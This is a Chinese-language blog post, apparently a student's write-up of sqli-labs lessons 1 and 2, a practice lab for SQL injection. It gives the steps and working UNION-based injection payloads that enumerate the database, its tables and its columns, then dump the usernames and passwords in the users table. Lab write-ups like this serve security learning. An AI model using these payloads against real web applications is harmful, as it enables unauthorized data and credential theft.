<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="第一关（字符型）1、判断是数字型还是字符型在url后面分别添加?id&#x3D;1, ?id&#x3D;2, ?id&#x3D;2-1 ，观察页面的变化，判断是字符型还是数字型。（如果id&#x3D;2-1 与 id&#x3D;1的页面一样，就是数字型；如果id&#x3D;2-1与id&#x3D;2的页面一样，就是字符型） 2、通过报错判断闭合符在id&#x3D;2后面分别加上&#39; , &quot; 即单引号，双引号，发现加&#39;时报错了，而加&quot;是正常显示">
<meta property="og:type" content="article">
<meta property="og:title" content="sqli-labs练习(第一、二关):字符型与数字型">
<meta property="og:url" content="http://example.com/2020/12/12/article-title-2/index.html">
<meta property="og:site_name" content="Yanghaoxuan&#39;sBlog">
<meta property="og:description" content="第一关（字符型）1、判断是数字型还是字符型在url后面分别添加?id&#x3D;1, ?id&#x3D;2, ?id&#x3D;2-1 ，观察页面的变化，判断是字符型还是数字型。（如果id&#x3D;2-1 与 id&#x3D;1的页面一样，就是数字型；如果id&#x3D;2-1与id&#x3D;2的页面一样，就是字符型） 2、通过报错判断闭合符在id&#x3D;2后面分别加上&#39; , &quot; 即单引号，双引号，发现加&#39;时报错了，而加&quot;是正常显示">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="c:/Users/Y4n9ne/Desktop/20200717113323491.png">
<meta property="og:image" content="c:/Users/Y4n9ne/Desktop/20200717113457752.png">
<meta property="og:image" content="c:/Users/Y4n9ne/Desktop/20200717114338128.png">
<meta property="article:published_time" content="2020-12-12T06:05:01.000Z">
<meta property="article:modified_time" content="2020-12-12T07:08:57.706Z">
<meta property="article:author" content="Yanghaoxuan">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:/Users/Y4n9ne/Desktop/20200717113323491.png">

<link rel="canonical" href="http://example.com/2020/12/12/article-title-2/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>sqli-labs练习(第一、二关):字符型与数字型 | Yanghaoxuan'sBlog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Yanghaoxuan'sBlog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2020/12/12/article-title-2/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Yanghaoxuan">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Yanghaoxuan'sBlog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          sqli-labs练习(第一、二关):字符型与数字型
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2020-12-12 14:05:01 / 修改时间：15:08:57" itemprop="dateCreated datePublished" datetime="2020-12-12T14:05:01+08:00">2020-12-12</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="第一关（字符型）"><a href="#第一关（字符型）" class="headerlink" title="第一关（字符型）"></a>第一关（字符型）</h1><h2 id="1、判断是数字型还是字符型"><a href="#1、判断是数字型还是字符型" class="headerlink" title="1、判断是数字型还是字符型"></a>1、判断是数字型还是字符型</h2><p>在url后面分别添加<code>?id=1, ?id=2, ?id=2-1</code> ，观察页面的变化，判断是字符型还是数字型。<br>（如果id=2-1 与 id=1的页面一样，就是数字型；如果id=2-1与id=2的页面一样，就是字符型）</p>
<h2 id="2、通过报错判断闭合符"><a href="#2、通过报错判断闭合符" class="headerlink" title="2、通过报错判断闭合符"></a>2、通过报错判断闭合符</h2><p>在id=2后面分别加上<code>&#39;</code> , <code>&quot;</code> 即单引号，双引号，发现加<code>&#39;</code>时报错了，而加<code>&quot;</code>是正常显示，说明闭合符是<code>&#39;</code>。所以我们应该使用<code>&#39;</code>，让它闭合。</p>
<h2 id="3、确认查询的字段数量"><a href="#3、确认查询的字段数量" class="headerlink" title="3、确认查询的字段数量"></a>3、确认查询的字段数量</h2><p>在后面分别添加<code>order by 1 --+</code>，<code>order by 2 --+</code>，<code>order by 3 --+</code>……<code>order by n --+</code>，观察是否报错，我们发现在by 3的时候还是正常的，而by 4的时候就没了，说明要查询的字段数量是3个。</p>
<h2 id="4、确认占位信息"><a href="#4、确认占位信息" class="headerlink" title="4、确认占位信息"></a>4、确认占位信息</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">…… union select 1,2,3 --+</span><br></pre></td></tr></table></figure>

<p>把id的值换成-1，不让它显示正常的值，然后在后面加上union select 1,2,3 –+。查看字段的占位信息。</p>
<p><img src="C:\Users\Y4n9ne\Desktop\20200717113323491.png" alt="20200717113323491"></p>
<p>1的位置是dhakkan，固定的，只能在2,3下手。</p>
<h2 id="5、找库名"><a href="#5、找库名" class="headerlink" title="5、找库名"></a>5、找库名</h2><p><code>…… union select 1,2,database() --+</code>，把3换成database(),即在输出3的地方输出数据库名。</p>
<p><img src="C:\Users\Y4n9ne\Desktop\20200717113457752.png" alt="20200717113457752"></p>
<p>发现数据库名字是<code>security</code></p>
<h2 id="6、查表名"><a href="#6、查表名" class="headerlink" title="6、查表名"></a>6、查表名</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">…… union select 1,2,group_concat(table_name) from information_schema.tables where table_schema&#x3D;&#39;security&#39;--+</span><br></pre></td></tr></table></figure>

<p>group_concat()是把要输出的内容都放在一个分组里输出，如果不加的话，就只会输出第一个表名。</p>
<h2 id="7、找表字段"><a href="#7、找表字段" class="headerlink" title="7、找表字段"></a>7、找表字段</h2><p>至于找哪个表里的内容，当然是users表</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">…… union select 1,2,group_concat(column_name) from information_schema.COLUMNs where table_schema&#x3D;&#39;security&#39; and table_name&#x3D;&#39;users&#39;--+</span><br></pre></td></tr></table></figure>

<p><img src="C:\Users\Y4n9ne\Desktop\20200717114338128.png" alt="20200717114338128"></p>
<p>users表里有id，username，password三个字段。</p>
<h2 id="8、找用户名和密码"><a href="#8、找用户名和密码" class="headerlink" title="8、找用户名和密码"></a>8、找用户名和密码</h2><p><code>…… union select 1,2,group_concat(concat_ws(&#39;,&#39;,username,password)) from users --+</code></p>
<p>concat_ws这个函数将username和password用逗号分开。</p>
<h1 id="第二关（数字型）"><a href="#第二关（数字型）" class="headerlink" title="第二关（数字型）"></a>第二关（数字型）</h1><h2 id="1、先判断是字符型还是数字型。"><a href="#1、先判断是字符型还是数字型。" class="headerlink" title="1、先判断是字符型还是数字型。"></a>1、先判断是字符型还是数字型。</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">172.16.11.222&#x2F;sqli-labs&#x2F;Less-2&#x2F;?id&#x3D;1</span><br></pre></td></tr></table></figure>

<p>id=2-1 与 id=1的结果一样，说明是数字型。</p>
<h2 id="2、确认字段位数"><a href="#2、确认字段位数" class="headerlink" title="2、确认字段位数"></a>2、确认字段位数</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">172.16.11.222&#x2F;sqli-labs&#x2F;Less-2&#x2F;?id&#x3D;1 order by 3</span><br></pre></td></tr></table></figure>

<p>接下来的步骤与第一关相同，只是少了第二步的<code>&quot;</code> 或 <code>&#39;</code>而已。</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/10/23/article-title-1/" rel="prev" title="自学HTML总结">
      <i class="fa fa-chevron-left"></i> 自学HTML总结
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/12/12/article-title-3/" rel="next" title="sqli-labs练习（第三、四关）">
      sqli-labs练习（第三、四关） <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E5%85%B3%EF%BC%88%E5%AD%97%E7%AC%A6%E5%9E%8B%EF%BC%89"><span class="nav-number">1.</span> <span class="nav-text">第一关（字符型）</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1%E3%80%81%E5%88%A4%E6%96%AD%E6%98%AF%E6%95%B0%E5%AD%97%E5%9E%8B%E8%BF%98%E6%98%AF%E5%AD%97%E7%AC%A6%E5%9E%8B"><span class="nav-number">1.1.</span> <span class="nav-text">1、判断是数字型还是字符型</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2%E3%80%81%E9%80%9A%E8%BF%87%E6%8A%A5%E9%94%99%E5%88%A4%E6%96%AD%E9%97%AD%E5%90%88%E7%AC%A6"><span class="nav-number">1.2.</span> <span class="nav-text">2、通过报错判断闭合符</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3%E3%80%81%E7%A1%AE%E8%AE%A4%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%AD%97%E6%AE%B5%E6%95%B0%E9%87%8F"><span class="nav-number">1.3.</span> <span class="nav-text">3、确认查询的字段数量</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4%E3%80%81%E7%A1%AE%E8%AE%A4%E5%8D%A0%E4%BD%8D%E4%BF%A1%E6%81%AF"><span class="nav-number">1.4.</span> <span class="nav-text">4、确认占位信息</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5%E3%80%81%E6%89%BE%E5%BA%93%E5%90%8D"><span class="nav-number">1.5.</span> <span class="nav-text">5、找库名</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#6%E3%80%81%E6%9F%A5%E8%A1%A8%E5%90%8D"><span class="nav-number">1.6.</span> <span class="nav-text">6、查表名</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#7%E3%80%81%E6%89%BE%E8%A1%A8%E5%AD%97%E6%AE%B5"><span class="nav-number">1.7.</span> <span class="nav-text">7、找表字段</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#8%E3%80%81%E6%89%BE%E7%94%A8%E6%88%B7%E5%90%8D%E5%92%8C%E5%AF%86%E7%A0%81"><span class="nav-number">1.8.</span> <span class="nav-text">8、找用户名和密码</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%AC%AC%E4%BA%8C%E5%85%B3%EF%BC%88%E6%95%B0%E5%AD%97%E5%9E%8B%EF%BC%89"><span class="nav-number">2.</span> <span class="nav-text">第二关（数字型）</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1%E3%80%81%E5%85%88%E5%88%A4%E6%96%AD%E6%98%AF%E5%AD%97%E7%AC%A6%E5%9E%8B%E8%BF%98%E6%98%AF%E6%95%B0%E5%AD%97%E5%9E%8B%E3%80%82"><span class="nav-number">2.1.</span> <span class="nav-text">1、先判断是字符型还是数字型。</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2%E3%80%81%E7%A1%AE%E8%AE%A4%E5%AD%97%E6%AE%B5%E4%BD%8D%E6%95%B0"><span class="nav-number">2.2.</span> <span class="nav-text">2、确认字段位数</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Yanghaoxuan</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">23</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Yanghaoxuan</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
